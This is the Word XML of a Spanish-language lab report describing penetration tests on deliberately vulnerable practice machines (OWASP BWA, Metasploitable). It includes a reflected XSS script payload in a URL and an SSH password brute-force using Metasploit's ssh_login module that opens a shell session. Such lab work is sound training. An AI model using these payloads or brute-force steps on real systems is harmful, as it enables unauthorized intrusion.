          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>n los diferentes proyectos que trae la maquina owaspbw</w:t>
      </w:r>
      <w:r w:rsidR="000F0E63">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">, en este caso comprobaremos un ataque de XSS en la URL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47310D3E" w14:textId="3FD5E8E7" w:rsidR="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="00EB016B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DA75A4" w14:textId="1378AB4B" w:rsidR="00EB016B" w:rsidRPr="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="00EB016B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17500D7A" wp14:editId="7971EB70">
            <wp:extent cx="5189516" cy="181204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5491" cy="1814130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3FFC7" w14:textId="75D4E591" w:rsidR="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="005334B3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB016B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>192.168.2.101/zapwave/active/xss/xss-url-basic.jsp?name=&lt;script&gt;alert("ataque XSS")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF834C" w14:textId="2F58CEA6" w:rsidR="00EB016B" w:rsidRDefault="00EB016B" w:rsidP="00EB016B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A751A6" wp14:editId="75A63C37">
            <wp:extent cx="5332020" cy="2513374"/>
            <wp:effectExtent l="0" t="0" r="254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8662" cy="2516505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC7BE9" w14:textId="7D2A9007" w:rsidR="00772896" w:rsidRDefault="00772896" w:rsidP="00772896">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E45C72" w14:textId="0B915BD8" w:rsidR="00772896" w:rsidRDefault="00772896" w:rsidP="00772896">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00772896">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Prueba de Explotación en el Puerto 22 SSH tanto para la maquina Owaspbw</w:t>
      </w:r>
      <w:r w:rsidR="00DC02D3">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00772896">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> como metasplotaible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9D9C8" w14:textId="0E77C00A" w:rsidR="00856948" w:rsidRDefault="00856948" w:rsidP="00B360A4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Antes de comenzar los ataques hay que crear un diccionario para nombres de usuario y otro para las contraseñas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EE88C" w14:textId="568F8362" w:rsidR="00856948" w:rsidRDefault="00856948" w:rsidP="00856948">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1522B78B" wp14:editId="6FE80A50">
            <wp:extent cx="2714286" cy="1066667"/>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286" cy="1066667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0217D" w14:textId="76572AB8" w:rsidR="00856948" w:rsidRDefault="00DC02D3" w:rsidP="00856948">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Después</w:t>
      </w:r>
      <w:r w:rsidR="00856948">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay que iniciar el siguiente servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257EEE80" w14:textId="48B56D8B" w:rsidR="00856948" w:rsidRDefault="00856948" w:rsidP="00856948">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047E9FE2" wp14:editId="28D9DB0E">
            <wp:extent cx="5612130" cy="173990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739900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="733855F1" w14:textId="534606B2" w:rsidR="00856948" w:rsidRDefault="00856948" w:rsidP="00856948">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407BB627" w14:textId="75B58B13" w:rsidR="00856948" w:rsidRPr="00DE3BE7" w:rsidRDefault="00DC02D3" w:rsidP="00DE3BE7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Después</w:t>
      </w:r>
      <w:r w:rsidR="00856948" w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r w:rsidR="00856948" w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r w:rsidR="00856948" w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">buscamos el exploit: </w:t>
      </w:r>
      <w:r w:rsidR="00856948" w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/ssh/ssh_login </w:t>
      </w:r>
      <w:r w:rsidR="00DE3BE7" w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>y configuramos los siguientes datos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC52E12" w14:textId="68F28FA8" w:rsidR="00DE3BE7" w:rsidRDefault="00DE3BE7" w:rsidP="00DE3BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61FA7E67" wp14:editId="1B3B64F4">
            <wp:extent cx="5612130" cy="1521460"/>
            <wp:effectExtent l="0" t="0" r="762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521460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7E1BD0" w14:textId="06539349" w:rsidR="00DE3BE7" w:rsidRDefault="00DE3BE7" w:rsidP="00DE3BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Ejecutamos con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE3BE7">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF9665" w14:textId="00E8851E" w:rsidR="00DE3BE7" w:rsidRDefault="00DE3BE7" w:rsidP="00DE3BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75468E35" wp14:editId="1C905AA8">
            <wp:extent cx="5612130" cy="208978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089785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73478A6A" w14:textId="1A95FF65" w:rsidR="00940559" w:rsidRDefault="00940559" w:rsidP="00940559">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07738084" w14:textId="4472C5C1" w:rsidR="00940559" w:rsidRDefault="00940559" w:rsidP="00940559">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940559">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando termine se </w:t>
      </w:r>
      <w:r w:rsidR="00DC02D3" w:rsidRPr="00940559">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>creará</w:t>
      </w:r>
      <w:r w:rsidRPr="00940559">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> una sesión por lo cual hay que usar el comando sessions si queremos ver la </w:t>
      </w:r>
      <w:r w:rsidR="00DC02D3" w:rsidRPr="00940559">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>sesión</w:t>
      </w:r>
      <w:r w:rsidRPr="00940559">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> o directamente usar el comando sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E216337" w14:textId="5D9D5340" w:rsidR="00940559" w:rsidRDefault="00940559" w:rsidP="00940559">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD03AC2" wp14:editId="4AE56D23">
            <wp:extent cx="5332020" cy="3381531"/>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5742" cy="3383892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FA280" w14:textId="4344C7B5" w:rsidR="00940559" w:rsidRDefault="00940559" w:rsidP="00940559">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Y también podemos llamar a la Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD5B36" w14:textId="5386D747" w:rsidR="008D273B" w:rsidRPr="008D273B" w:rsidRDefault="00940559" w:rsidP="008D273B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Arial" w:hAnsi="Georgia" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2299D181" wp14:editId="3FEEBE38">
            <wp:simplePos x="1084521" y="4752753"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5362850" cy="4037611"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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62850" cy="4037611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008D273B" w:rsidRPr="008D273B" w:rsidSect="00C8634D">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36E92" w14:textId="77777777" w:rsidR="00644AA2" w:rsidRDefault="00644AA2" w:rsidP="00FB5271">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5FBE3409" w14:textId="77777777" w:rsidR="00644AA2" w:rsidRDefault="00644AA2" w:rsidP="00FB5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Cuerpo en alfa">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Avenir Light">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="4D"/>
    <w:family w:val="swiss"/>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7BAD9" w14:textId="77777777" w:rsidR="00644AA2" w:rsidRDefault="00644AA2" w:rsidP="00FB5271">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49261E33" w14:textId="77777777" w:rsidR="00644AA2" w:rsidRDefault="00644AA2" w:rsidP="00FB5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31D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C8A41CC"/>
    <w:lvl w:ilvl="0" w:tplc="A9DAB7C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Tablas"/>
      <w:lvlText w:val="Tabla %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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F2F51AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F46A68"/>
    <w:lvl w:ilvl="0" w:tplc="0409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455B080C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0ABC38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25166FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A06A86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64335666">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1323385288">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1319267231">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="384060391">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="148138069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24"/>
    <w:rsid w:val="000A77CB"/>
    <w:rsid w:val="000C4C5B"/>
    <w:rsid w:val="000E4177"/>
    <w:rsid w:val="000F0E63"/>
    <w:rsid w:val="00116FD9"/>
    <w:rsid w:val="00143C34"/>
    <w:rsid w:val="001C5868"/>
    <w:rsid w:val="001E2E94"/>
    <w:rsid w:val="001E62FF"/>
    <w:rsid w:val="002349D2"/>
    <w:rsid w:val="002724CB"/>
    <w:rsid w:val="00272D2D"/>
    <w:rsid w:val="002B14D2"/>
    <w:rsid w:val="002C42CF"/>
    <w:rsid w:val="003207FA"/>
    <w:rsid w:val="00343B24"/>
    <w:rsid w:val="00363A97"/>
    <w:rsid w:val="003742AD"/>
    <w:rsid w:val="003C592E"/>
    <w:rsid w:val="00403067"/>
    <w:rsid w:val="00482C65"/>
    <w:rsid w:val="0049118C"/>
    <w:rsid w:val="004A3343"/>
    <w:rsid w:val="00521942"/>
    <w:rsid w:val="005334B3"/>
    <w:rsid w:val="0056575A"/>
    <w:rsid w:val="0057775B"/>
    <w:rsid w:val="0058651B"/>
    <w:rsid w:val="005B1E92"/>
    <w:rsid w:val="005D4C37"/>
    <w:rsid w:val="005F2B55"/>
    <w:rsid w:val="00644AA2"/>
    <w:rsid w:val="006E6F51"/>
    <w:rsid w:val="00723C06"/>
    <w:rsid w:val="0073215E"/>
    <w:rsid w:val="00742C21"/>
    <w:rsid w:val="00751489"/>
    <w:rsid w:val="007649DA"/>
    <w:rsid w:val="00772896"/>
    <w:rsid w:val="007B2D98"/>
    <w:rsid w:val="007B59D0"/>
    <w:rsid w:val="007E5322"/>
    <w:rsid w:val="00837B5A"/>
    <w:rsid w:val="00856948"/>
    <w:rsid w:val="00873B25"/>
    <w:rsid w:val="008A393D"/>
    <w:rsid w:val="008A4824"/>
    <w:rsid w:val="008D273B"/>
    <w:rsid w:val="008D3109"/>
    <w:rsid w:val="008E5F45"/>
    <w:rsid w:val="008E6E82"/>
    <w:rsid w:val="00932756"/>
    <w:rsid w:val="009362FC"/>
    <w:rsid w:val="00940559"/>
    <w:rsid w:val="009D05E1"/>
    <w:rsid w:val="009E267E"/>
    <w:rsid w:val="00A33C30"/>
    <w:rsid w:val="00A45F76"/>
    <w:rsid w:val="00A87A2C"/>
    <w:rsid w:val="00A97387"/>
    <w:rsid w:val="00AA10C5"/>
    <w:rsid w:val="00AA754B"/>
    <w:rsid w:val="00B360A4"/>
    <w:rsid w:val="00B61292"/>
    <w:rsid w:val="00BC3A83"/>
    <w:rsid w:val="00C33FA4"/>
    <w:rsid w:val="00C502B4"/>
    <w:rsid w:val="00C64EEA"/>
    <w:rsid w:val="00C71FAF"/>
    <w:rsid w:val="00C8559C"/>
    <w:rsid w:val="00C8634D"/>
    <w:rsid w:val="00C964F9"/>
    <w:rsid w:val="00CC2E17"/>
    <w:rsid w:val="00D061F2"/>
    <w:rsid w:val="00D3738E"/>
    <w:rsid w:val="00D468D8"/>
    <w:rsid w:val="00D85A35"/>
    <w:rsid w:val="00D975CC"/>
    <w:rsid w:val="00DB3A8F"/>
    <w:rsid w:val="00DC02D3"/>
    <w:rsid w:val="00DC6258"/>
    <w:rsid w:val="00DD5B4A"/>
    <w:rsid w:val="00DE3BE7"/>
    <w:rsid w:val="00DF77AB"/>
    <w:rsid w:val="00E702BA"/>
    <w:rsid w:val="00E94A48"/>
    <w:rsid w:val="00EB016B"/>
    <w:rsid w:val="00EC1990"/>
    <w:rsid w:val="00EF1C4C"/>
    <w:rsid w:val="00EF2CD6"/>
    <w:rsid w:val="00F71DFE"/>
    <w:rsid w:val="00FB5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153DE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7751E2BE-5317-4C93-BDB3-7ED211A5E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7FA"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:val="es-MX"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52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271"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:val="es-MX" w:eastAsia="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FB52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271"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:val="es-MX" w:eastAsia="es-ES_tradnl"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E702BA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula4-nfasis5">
    <w:name w:val="Grid Table 4 Accent 5"/>
    <w:basedOn w:val="Tablanormal"/>
